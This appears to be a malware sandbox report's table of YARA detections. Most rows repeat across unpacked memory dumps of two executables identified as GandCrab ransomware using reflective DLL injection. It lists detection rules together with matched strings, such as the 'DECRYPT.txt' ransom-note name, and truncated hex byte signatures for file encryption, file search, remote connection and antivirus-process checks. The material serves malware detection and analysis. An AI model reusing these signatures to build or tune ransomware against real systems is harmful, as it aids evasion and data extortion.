0.3.IJr8RvvhZ3.exe.3210000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xd992:$x1: ReflectiveLoader
0.3.IJr8RvvhZ3.exe.3210000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xd2fe:$: DECRYPT.txt 0xd364:$: DECRYPT.txt
0.3.IJr8RvvhZ3.exe.3210000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
0.3.IJr8RvvhZ3.exe.3210000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xd991:$s1: _ReflectiveLoader@ 0xd992:$s2: ReflectiveLoader@
0.3.IJr8RvvhZ3.exe.3210000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xcfc8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
0.3.IJr8RvvhZ3.exe.3210000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x3cf0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4161:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x55f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x30d3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6370:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
11.0.mqsmvj.exe.f580000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
11.0.mqsmvj.exe.f580000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
11.0.mqsmvj.exe.f580000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
11.0.mqsmvj.exe.f580000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
11.0.mqsmvj.exe.f580000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
11.0.mqsmvj.exe.f580000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 58 0F 8B 35 44 A1 58 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 58 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 58 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 58 0F 8B 35 10 A1 58 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 58 0F C7 44 24 1C 64 F4 58 0F C7 44 24 20 80 F4 58 0F C7 44 24 24 A0 F4 58 0F C7 44 24 28 BC F4 58 0F C7 44 24 2C D8 F4 58 0F C7 44 24 30 F0 F4 58 0F C7 44 24 34 04 F5 58 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 58 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 59 0F C7 45 B8 BC 03 59 0F C7 45 BC ...
0.2.IJr8RvvhZ3.exe.f140000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
0.2.IJr8RvvhZ3.exe.f140000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
0.2.IJr8RvvhZ3.exe.f140000.0.unpack	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
0.2.IJr8RvvhZ3.exe.f140000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
0.2.IJr8RvvhZ3.exe.f140000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
0.2.IJr8RvvhZ3.exe.f140000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
0.2.IJr8RvvhZ3.exe.f140000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 14 0F 8B 35 44 A1 14 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 14 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 14 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 14 0F 8B 35 10 A1 14 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 14 0F C7 44 24 1C 64 F4 14 0F C7 44 24 20 80 F4 14 0F C7 44 24 24 A0 F4 14 0F C7 44 24 28 BC F4 14 0F C7 44 24 2C D8 F4 14 0F C7 44 24 30 F0 F4 14 0F C7 44 24 34 04 F5 14 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 14 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 15 0F C7 45 B8 BC 03 15 0F C7 45 BC ...
27.3.mqsmvj.exe.3490000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xd992:$x1: ReflectiveLoader
27.3.mqsmvj.exe.3490000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xd2fe:$: DECRYPT.txt 0xd364:$: DECRYPT.txt
27.3.mqsmvj.exe.3490000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
27.3.mqsmvj.exe.3490000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xd991:$s1: _ReflectiveLoader@ 0xd992:$s2: ReflectiveLoader@
27.3.mqsmvj.exe.3490000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xcfc8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
27.3.mqsmvj.exe.3490000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x3cf0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4161:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x55f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x30d3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6370:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
19.2.mqsmvj.exe.f580000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
19.2.mqsmvj.exe.f580000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
19.2.mqsmvj.exe.f580000.0.unpack	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
19.2.mqsmvj.exe.f580000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
19.2.mqsmvj.exe.f580000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
19.2.mqsmvj.exe.f580000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
19.2.mqsmvj.exe.f580000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 58 0F 8B 35 44 A1 58 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 58 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 58 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 58 0F 8B 35 10 A1 58 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 58 0F C7 44 24 1C 64 F4 58 0F C7 44 24 20 80 F4 58 0F C7 44 24 24 A0 F4 58 0F C7 44 24 28 BC F4 58 0F C7 44 24 2C D8 F4 58 0F C7 44 24 30 F0 F4 58 0F C7 44 24 34 04 F5 58 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 58 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 59 0F C7 45 B8 BC 03 59 0F C7 45 BC ...
12.0.mqsmvj.exe.f580000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
12.0.mqsmvj.exe.f580000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
12.0.mqsmvj.exe.f580000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
12.0.mqsmvj.exe.f580000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
12.0.mqsmvj.exe.f580000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
12.0.mqsmvj.exe.f580000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 58 0F 8B 35 44 A1 58 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 58 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 58 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 58 0F 8B 35 10 A1 58 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 58 0F C7 44 24 1C 64 F4 58 0F C7 44 24 20 80 F4 58 0F C7 44 24 24 A0 F4 58 0F C7 44 24 28 BC F4 58 0F C7 44 24 2C D8 F4 58 0F C7 44 24 30 F0 F4 58 0F C7 44 24 34 04 F5 58 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 58 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 59 0F C7 45 B8 BC 03 59 0F C7 45 BC ...
16.3.mqsmvj.exe.3b50000.0.raw.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
16.3.mqsmvj.exe.3b50000.0.raw.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
16.3.mqsmvj.exe.3b50000.0.raw.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
16.3.mqsmvj.exe.3b50000.0.raw.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
16.3.mqsmvj.exe.3b50000.0.raw.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
16.3.mqsmvj.exe.3b50000.0.raw.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
12.2.mqsmvj.exe.f580000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
12.2.mqsmvj.exe.f580000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
12.2.mqsmvj.exe.f580000.0.unpack	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
12.2.mqsmvj.exe.f580000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
12.2.mqsmvj.exe.f580000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
12.2.mqsmvj.exe.f580000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
12.2.mqsmvj.exe.f580000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 58 0F 8B 35 44 A1 58 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 58 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 58 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 58 0F 8B 35 10 A1 58 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 58 0F C7 44 24 1C 64 F4 58 0F C7 44 24 20 80 F4 58 0F C7 44 24 24 A0 F4 58 0F C7 44 24 28 BC F4 58 0F C7 44 24 2C D8 F4 58 0F C7 44 24 30 F0 F4 58 0F C7 44 24 34 04 F5 58 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 58 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 59 0F C7 45 B8 BC 03 59 0F C7 45 BC ...
28.2.mqsmvj.exe.f580000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
28.2.mqsmvj.exe.f580000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
28.2.mqsmvj.exe.f580000.0.unpack	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
28.2.mqsmvj.exe.f580000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
28.2.mqsmvj.exe.f580000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
28.2.mqsmvj.exe.f580000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
28.2.mqsmvj.exe.f580000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 58 0F 8B 35 44 A1 58 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 58 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 58 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 58 0F 8B 35 10 A1 58 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 58 0F C7 44 24 1C 64 F4 58 0F C7 44 24 20 80 F4 58 0F C7 44 24 24 A0 F4 58 0F C7 44 24 28 BC F4 58 0F C7 44 24 2C D8 F4 58 0F C7 44 24 30 F0 F4 58 0F C7 44 24 34 04 F5 58 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 58 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 59 0F C7 45 B8 BC 03 59 0F C7 45 BC ...
37.0.mqsmvj.exe.f580000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
37.0.mqsmvj.exe.f580000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
37.0.mqsmvj.exe.f580000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
37.0.mqsmvj.exe.f580000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
37.0.mqsmvj.exe.f580000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
37.0.mqsmvj.exe.f580000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 58 0F 8B 35 44 A1 58 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 58 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 58 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 58 0F 8B 35 10 A1 58 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 58 0F C7 44 24 1C 64 F4 58 0F C7 44 24 20 80 F4 58 0F C7 44 24 24 A0 F4 58 0F C7 44 24 28 BC F4 58 0F C7 44 24 2C D8 F4 58 0F C7 44 24 30 F0 F4 58 0F C7 44 24 34 04 F5 58 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 58 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 59 0F C7 45 B8 BC 03 59 0F C7 45 BC ...
14.2.mqsmvj.exe.f580000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
14.2.mqsmvj.exe.f580000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
14.2.mqsmvj.exe.f580000.0.unpack	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
14.2.mqsmvj.exe.f580000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
14.2.mqsmvj.exe.f580000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
14.2.mqsmvj.exe.f580000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
